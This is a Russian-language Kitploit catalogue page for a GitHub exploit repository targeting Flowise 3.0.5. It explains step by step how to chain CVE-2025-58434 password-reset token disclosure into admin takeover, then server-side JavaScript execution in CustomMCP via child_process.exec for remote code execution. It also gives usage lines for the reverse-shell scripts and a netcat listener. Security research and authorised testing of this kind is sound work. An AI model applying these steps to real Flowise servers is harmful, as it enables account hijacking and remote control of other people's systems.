Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/r3vpwnx/cve-2025-58434
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Эксплуатационная цепочка для Flowise 3.0.5: несанкционированный захват учётной записи через раскрытие токена сброса пароля (CVE-2025-58434) в связке с выполнением JavaScript в CustomMCP для удалённого выполнения кода.

Репозиторий
1 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434 — несанкционированный захват учётной записи Flowise, объединённый с RCE через CustomMCP

Две проблемы Flowise 3.0.5, объединённые в цепочку:

  1. CVE-2025-58434 — раскрытие токена сброса пароля. POST /api/v1/account/forgot-password возвращает tempToken целевого пользователя непосредственно в JSON-ответе. Передайте его в POST /api/v1/account/reset-password, чтобы установить известный пароль для любой учётной записи, включая первого администратора -> полный несанкционированный захват учётной записи.
  2. Выполнение серверного JavaScript в mcpServerConfig CustomMCP. Имея сессию и ключ API рабочей области (из шага 1), POST /api/v1/node-load-method/customMCP с loadMethod=listActions выполняет строку mcpServerConfig как JavaScript в процессе Flowise, что даёт RCE через . (Отдельная проблема Flowise, используемая здесь только для превращения ATO в выполнение кода; на момент написания CVE не присвоен.)
require('child_process').exec()

CVE: CVE-2025-58434

Требования

root@kitploit:~
python3 -m pip install requests

Использование

flowise_ato_foothold.py — полная цепочка (ATO -> ключ API -> reverse shell через CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# подготовьте `nc -lvnp <LPORT>`

flowise_customMCP_rce.py — только RCE через CustomMCP (требуется ключ API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'

Ссылки

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных целей. Запускайте это только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.


Автор: r3vpwnx

Скачать инструмент